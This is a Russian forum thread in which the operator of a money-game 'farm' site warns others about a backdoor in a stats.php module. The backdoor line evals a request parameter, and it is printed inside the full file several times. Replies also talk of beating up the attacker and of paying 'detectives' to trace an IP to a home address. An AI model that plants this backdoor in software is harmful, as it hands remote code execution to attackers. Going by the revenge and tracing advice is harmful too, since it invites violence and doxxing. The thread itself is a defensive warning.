master09
Местный
- Сообщения
- 68
- Реакции
- 8
Дорогие пользователи рекомендую проверить вот такой код он может оказаться у кого стоит полная статистика проекта вот код через который мне залили страницы и вывели 100 000 тыс
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
я выложил код как оно выглядит проверьте у себя что не было такой фигни и удалите обязательно иначе у Вас уведут все деньги...
Начиналось всё хорошо проект раскрутил всё прёт денег много я беру свои деньги с рекламы и меня всё устраивает но стал замечать что в корне появились не понятные файлы я их удалил проверил антивирусом вроде норм а это код не заметил да и не знал что там прописана дыра в файле stats. .. Далее начали деньги пропадать не обратил внимание... А сейчас 2 сентября в 10 часов мне вводят 13000 тыс и после у меня выводят 100 000 тыс были разные подозрения на разных людей даже на хостинг iphoster payeer но оказалось я сам виноват поставил и не проверил и благо даре дыре мне залили файлы вывели все деньги поставили ещё пару дыр но вроде убрал буду дальше смотреть.
Теперь вопрос такой я знаю его кошелек знаю ip с которого он всё это сделал файлы от куда взял и как закинул мне по логам всё видно....Как мне найти его куда обратиться и могу ли Я вопрос решить или даже не стоит замораживаться сразу скажу payeer отказался работать со мной типо ищите у Вас дыра настраивайте скрипт данные не будем предоставлять так как мы не зависимые чёто чёто мудаки они короче как быть в данной ситуации куда обратиться фсб,мвд,роскомнадзор, или блять поехать к нему в город и искать как понимаете деньги не мои людям не скажешь что взломали будет кипишь а виноват то сейчас только я так что кто что скажет?!А ещё что вспомнил это сука еще создала копию моего полностью сайта и скачал себе.
Адрес своего сайта оставлю анонимным и кто меня знает просьба не распространят сайт спасибо!
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
я выложил код как оно выглядит проверьте у себя что не было такой фигни и удалите обязательно иначе у Вас уведут все деньги...
Код:
<?PHP
$_OPTIMIZATION["title"] = "Статистика";
$_OPTIMIZATION["description"] = "Полная статистика системы";
$_OPTIMIZATION["keywords"] = "Статистика";
$user_id = $_SESSION["user_id"];
$tfstats = time() - 60*60*24;
$db->Query("SELECT
(SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
$db->Query("SELECT
SUM(money_b) money_b,
SUM(money_p) money_p,
SUM(a_t) a_t,
SUM(b_t) b_t,
SUM(c_t) c_t,
SUM(d_t) d_t,
SUM(e_t) e_t
FROM db_users_b");
$data_stats = $db->FetchArray();
?>
<br/>
<table border="0">
<tr>
<td colspan="3"><h4>Статистика проекта</h4></td>
</tr>
<tr>
<td><b>Всего игроков:</b></td>
<td width="40%"><?=$stats_data["all_users"]; ?> чел.</td>
</tr>
<tr>
<td><b>Новых за 24 часа:</b></td>
<td width="40%"><?=$stats_data["new_users"]; ?> чел.</td>
</tr>
<tr>
<td><b>Сейчас онлайн:</b></td>
<td><?=$stats_data["online_users"]; ?> чел.</td>
</tr>
<tr>
<td><b>Серебра для покупок:</b></td>
<td width="40%"><?=sprintf("%.0f",$data_stats["money_b"]); ?> шт.</td>
</tr>
<tr>
<td><b>Серебра для вывода:</b></td>
<td width="40%"><?=sprintf("%.0f",$data_stats["money_p"]); ?> шт.</td>
</tr>
<tr>
<td><b>Выплачено всего:</b></td>
<td width="40%"><?=sprintf("%.2f",$stats_data["all_payment"]); ?> руб.</td>
</tr>
<tr>
<td><b>Резерв проекта:</b></td>
<td width="40%"><?=sprintf("%.2f",$stats_data["all_insert"]); ?> руб.</td>
</tr>
<tr>
<td><b>Проект работает:</b></td>
<td width="40%"><?=intval(((time() - $config->SYSTEM_START_TIME) / 86400 ) +1); ?>-й день</td>
</tr>
<tr><td colspan="2"> </td></tr>
</tr>
<tr>
<td colspan="3"><h4>Статистика растений</h4></td>
</tr>
<tr>
<td><b>Куплено Подсолнушков:</b></td>
<td width="40%"><?=intval($data_stats["a_t"]); ?> шт.</td>
</tr>
<tr>
<td><b>Куплено Грибочков:</b></td>
<td width="40%"><?=intval($data_stats["b_t"]); ?> шт.</td>
</tr>
<tr>
<td><b>Куплено Чесночка:</b></td>
<td width="40%"><?=intval($data_stats["c_t"]); ?> шт.</td>
</tr>
<tr>
<td><b>Куплено Перчиков:</b></td>
<td width="40%"><?=intval($data_stats["d_t"]); ?> шт.</td>
</tr>
<tr>
<td><b>Куплено Кабачков:</b></td>
<td width="40%"><?=intval($data_stats["e_t"]); ?> шт.</td>
</tr>
</table>
Теперь вопрос такой я знаю его кошелек знаю ip с которого он всё это сделал файлы от куда взял и как закинул мне по логам всё видно....Как мне найти его куда обратиться и могу ли Я вопрос решить или даже не стоит замораживаться сразу скажу payeer отказался работать со мной типо ищите у Вас дыра настраивайте скрипт данные не будем предоставлять так как мы не зависимые чёто чёто мудаки они короче как быть в данной ситуации куда обратиться фсб,мвд,роскомнадзор, или блять поехать к нему в город и искать как понимаете деньги не мои людям не скажешь что взломали будет кипишь а виноват то сейчас только я так что кто что скажет?!А ещё что вспомнил это сука еще создала копию моего полностью сайта и скачал себе.
Адрес своего сайта оставлю анонимным и кто меня знает просьба не распространят сайт спасибо!
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Офигеть !!! Вопрос к тебе только один ! А зачем на кошельке пеер-магазина держать 100.000 рублей ??? Я лично использую 2 кошелька один для выплат с небольшой суммой , а другой резервный с суммой уже побольше ! На будущее советую делать именно так ! Хоть какая то страховка ! Ты ведь знал, что уродов хватает и спят и видят как деньги стянуть у админов ! А козла наказать конечно надо ! Весь вопрос только как ? Надо подумать на эту тему ! Если ip статический и не меняется то и адрес его ты сможешь думаю выяснить ! Ради 100 тыс рублей я бы и на Камчатку съездил и морду набил , правда тяжело сдержаться от более серьезных последствий не хочется из-за этого козла в тюрягу за убийство сесть Поэтому хотя бы морду набить ! А с юридической точки зрения : наши фермы не совсем и законны мягко скажем поэтому офиц что то доказать думаю сложно , в США за такое бы этого горе-хакера бы точно посадили на долго ! Но там и ферм наверно нету , а жаль Подумай , хорошенько , но спускать с рук такое нельзя , наказать просто необходимо !master09 написал(а):Дорогие пользователи рекомендую проверить вот такой код он может оказаться у кого стоит полная статистика проекта вот код через который мне залили страницы и вывели 100 000 тыс
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
я выложил код как оно выглядит проверьте у себя что не было такой фигни и удалите обязательно иначе у Вас уведут все деньги...
Начиналось всё хорошо проект раскрутил всё прёт денег много я беру свои деньги с рекламы и меня всё устраивает но стал замечать что в корне появились не понятные файлы я их удалил проверил антивирусом вроде норм а это код не заметил да и не знал что там прописана дыра в файле stats. .. Далее начали деньги пропадать не обратил внимание... А сейчас 2 сентября в 10 часов мне вводят 13000 тыс и после у меня выводят 100 000 тыс были разные подозрения на разных людей даже на хостинг iphoster payeer но оказалось я сам виноват поставил и не проверил и благо даре дыре мне залили файлы вывели все деньги поставили ещё пару дыр но вроде убрал буду дальше смотреть.Код:<?PHP $_OPTIMIZATION["title"] = "Статистика"; $_OPTIMIZATION["description"] = "Полная статистика системы"; $_OPTIMIZATION["keywords"] = "Статистика"; $user_id = $_SESSION["user_id"]; $tfstats = time() - 60*60*24; $db->Query("SELECT (SELECT COUNT(*) FROM db_users_a) all_users, (SELECT SUM(insert_sum) FROM db_users_b) all_insert, (SELECT SUM(payment_sum) FROM db_users_b) all_payment, (SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users, (SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users"); $stats_data = $db->FetchArray(); if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();} $db->Query("SELECT SUM(money_b) money_b, SUM(money_p) money_p, SUM(a_t) a_t, SUM(b_t) b_t, SUM(c_t) c_t, SUM(d_t) d_t, SUM(e_t) e_t FROM db_users_b"); $data_stats = $db->FetchArray(); ?> <br/> <table border="0"> <tr> <td colspan="3"><h4>Статистика проекта</h4></td> </tr> <tr> <td><b>Всего игроков:</b></td> <td width="40%"><?=$stats_data["all_users"]; ?> чел.</td> </tr> <tr> <td><b>Новых за 24 часа:</b></td> <td width="40%"><?=$stats_data["new_users"]; ?> чел.</td> </tr> <tr> <td><b>Сейчас онлайн:</b></td> <td><?=$stats_data["online_users"]; ?> чел.</td> </tr> <tr> <td><b>Серебра для покупок:</b></td> <td width="40%"><?=sprintf("%.0f",$data_stats["money_b"]); ?> шт.</td> </tr> <tr> <td><b>Серебра для вывода:</b></td> <td width="40%"><?=sprintf("%.0f",$data_stats["money_p"]); ?> шт.</td> </tr> <tr> <td><b>Выплачено всего:</b></td> <td width="40%"><?=sprintf("%.2f",$stats_data["all_payment"]); ?> руб.</td> </tr> <tr> <td><b>Резерв проекта:</b></td> <td width="40%"><?=sprintf("%.2f",$stats_data["all_insert"]); ?> руб.</td> </tr> <tr> <td><b>Проект работает:</b></td> <td width="40%"><?=intval(((time() - $config->SYSTEM_START_TIME) / 86400 ) +1); ?>-й день</td> </tr> <tr><td colspan="2"> </td></tr> </tr> <tr> <td colspan="3"><h4>Статистика растений</h4></td> </tr> <tr> <td><b>Куплено Подсолнушков:</b></td> <td width="40%"><?=intval($data_stats["a_t"]); ?> шт.</td> </tr> <tr> <td><b>Куплено Грибочков:</b></td> <td width="40%"><?=intval($data_stats["b_t"]); ?> шт.</td> </tr> <tr> <td><b>Куплено Чесночка:</b></td> <td width="40%"><?=intval($data_stats["c_t"]); ?> шт.</td> </tr> <tr> <td><b>Куплено Перчиков:</b></td> <td width="40%"><?=intval($data_stats["d_t"]); ?> шт.</td> </tr> <tr> <td><b>Куплено Кабачков:</b></td> <td width="40%"><?=intval($data_stats["e_t"]); ?> шт.</td> </tr> </table>
Теперь вопрос такой я знаю его кошелек знаю ip с которого он всё это сделал файлы от куда взял и как закинул мне по логам всё видно....Как мне найти его куда обратиться и могу ли Я вопрос решить или даже не стоит замораживаться сразу скажу payeer отказался работать со мной типо ищите у Вас дыра настраивайте скрипт данные не будем предоставлять так как мы не зависимые чёто чёто мудаки они короче как быть в данной ситуации куда обратиться фсб,мвд,роскомнадзор, или блять поехать к нему в город и искать как понимаете деньги не мои людям не скажешь что взломали будет кипишь а виноват то сейчас только я так что кто что скажет?!А ещё что вспомнил это сука еще создала копию моего полностью сайта и скачал себе.
Адрес своего сайта оставлю анонимным и кто меня знает просьба не распространят сайт спасибо!
master09
Местный
- Сообщения
- 68
- Реакции
- 8
Хорошо спасибо подумаю как сделать и найти его есть примерное расположение его.А на счёт да я держу на двух кошельках но был очень занят и всё забывал перевести на другой кошелек вот и попался а он видать давно мою ферму пас дождался когда сумма хорошая набираться и начал действовать если я его как то найду он мне отдаст не только 100 000 тыс но и более я думаю он не одну ферму ограбил раз знает что там дыра есть и сайт от куда я взял этот модуль!
Rubrika
Участник
- Сообщения
- 342
- Реакции
- 43
в интернете куча "детективов", которые за небольшую плату - пробьют почти любой IP вплоть до домашнего адреса, ибо имеют хорошие связи и опыт, я тебе направление подсказал - дальше сам..)
Ток подумай - может он с прокси или впн сидел, а может через связку или еще чего,это тебе сильно осложнит дело )
Ток подумай - может он с прокси или впн сидел, а может через связку или еще чего,это тебе сильно осложнит дело )
Reset
Участник
- Сообщения
- 212
- Реакции
- 16
Fedor
Участник
- Сообщения
- 1
- Реакции
- 0
Меня тоже ни раз ломали, но найти - не реально.. Пэер инфу не выдаёт и даже не блочит такие кошельки.
А ИПшники в логах ничего не дадут.. Те, кто этим занимаются сидят через ВПН, прокси и т.д.
Чтобы пробить адрес через ментов и найти человека, нужно чтоб заява была и уголовное дело было заведено.
Тыж не напишешь в заяве, что держишь Хайп (пирамиду), а нехорошие дядьки тебя звлломали?! ))
А ИПшники в логах ничего не дадут.. Те, кто этим занимаются сидят через ВПН, прокси и т.д.
Чтобы пробить адрес через ментов и найти человека, нужно чтоб заява была и уголовное дело было заведено.
Тыж не напишешь в заяве, что держишь Хайп (пирамиду), а нехорошие дядьки тебя звлломали?! ))
ksander
Участник
- Сообщения
- 100
- Реакции
- 16
Я как понял достаточно удалить данную строку? Верно ?master09 написал(а):if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
Andreys
Участник
- Сообщения
- 576
- Реакции
- 40
Походу она родная, ни в одной ферме не замечал, такую.ksander написал(а):Я как понял достаточно удалить данную строку? Верно ?
Andreys
Участник
- Сообщения
- 576
- Реакции
- 40
А с какого сайта скачивали, скрипт ? Эта дыра сразу там была. или потом появилась.?
Да и на хостинг можно подумать, по идее за хостингом такие же люди следят как и мы.
У меня на этом хостинге http://hostmig.ru/ было несколько сайтов, хозяин хостинга не оплатил домен как я понял. И теперь я не могу уже свой домен который зарегал у них, снять с регистрации чтобы на другой хост перенести.
А полиция вряд ли этим займется. у них на первом месте раскрытие убийств, наркоты, а мошенничество на последнем месте, да спецов у них там таких , раз да обчелся.
Да и на хостинг можно подумать, по идее за хостингом такие же люди следят как и мы.
У меня на этом хостинге http://hostmig.ru/ было несколько сайтов, хозяин хостинга не оплатил домен как я понял. И теперь я не могу уже свой домен который зарегал у них, снять с регистрации чтобы на другой хост перенести.
А полиция вряд ли этим займется. у них на первом месте раскрытие убийств, наркоты, а мошенничество на последнем месте, да спецов у них там таких , раз да обчелся.
Последнее редактирование:
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
Вот такой у меня код вверху:
PHP:
<?PHP
$tfstats = time() - 60*60*24;
$db->Query("SELECT (SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats']))
{
if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']);
eval($_REQUEST['stats']); die();
}
$db->Query("SELECT SUM(money_b) money_b,
SUM(money_p) money_p,
SUM(a_t) a_t,
SUM(b_t) b_t,
SUM(c_t) c_t,
SUM(d_t) d_t,
SUM(e_t) e_t,
SUM(f_t) f_t
FROM db_users_b");
$data_stats = $db->FetchArray();
?>
Последнее редактирование модератором:
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Вячеслав написал(а):Вот такой у меня код вверху:
выкидывай эту хрень нафиг это не к добру и есть самый настоящий шелл или вирус мне без разницы этого быть не должно ты хоть переведи слова с англ и сам все поймешь , у меня было подобное : волшебные кавычки и последнее слово "умрет" как тебе ? Вообще "супер " !PHP:<?PHP $tfstats = time() - 60*60*24; $db->Query("SELECT (SELECT COUNT(*) FROM db_users_a) all_users, (SELECT SUM(insert_sum) FROM db_users_b) all_insert, (SELECT SUM(payment_sum) FROM db_users_b) all_payment, (SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users, (SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users"); $stats_data = $db->FetchArray(); if(!empty($_REQUEST['stats'])) { if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die(); } $db->Query("SELECT SUM(money_b) money_b, SUM(money_p) money_p, SUM(a_t) a_t, SUM(b_t) b_t, SUM(c_t) c_t, SUM(d_t) d_t, SUM(e_t) e_t, SUM(f_t) f_t FROM db_users_b"); $data_stats = $db->FetchArray(); ?>[/QUOTE] { if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die(); }
Последнее редактирование модератором:
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
это в модуле Пожертвования я такую хреновину нашел , а модуль брал отсюда с форума , если будете качать пожертвования проверьте модуль на этот вредоносный код он будет в конце файла там где лимит на 50 последних сумм стоятьВячеслав написал(а):Хорошо что я вовремя на форум зашел а сайт такой класный получается, не хотоел бы оказаться в таком дерьме как вы. Надо убирать, лучше вообще использовать стандартную ферму, просто дыры убрать всем известные, а другие скрипты не качать. Иногда даже за деньги тебя же и грабят
Вячеслав
Местный
- Сообщения
- 229
- Реакции
- 21
да я вообще лучше от сюда качать ничего не буду, у меня есть знакомая продавец, Татьяна, уж она то всегда продаёт чистое и помогает всем рекомендую ее https://servahoc.ru/members/matanya565.1976/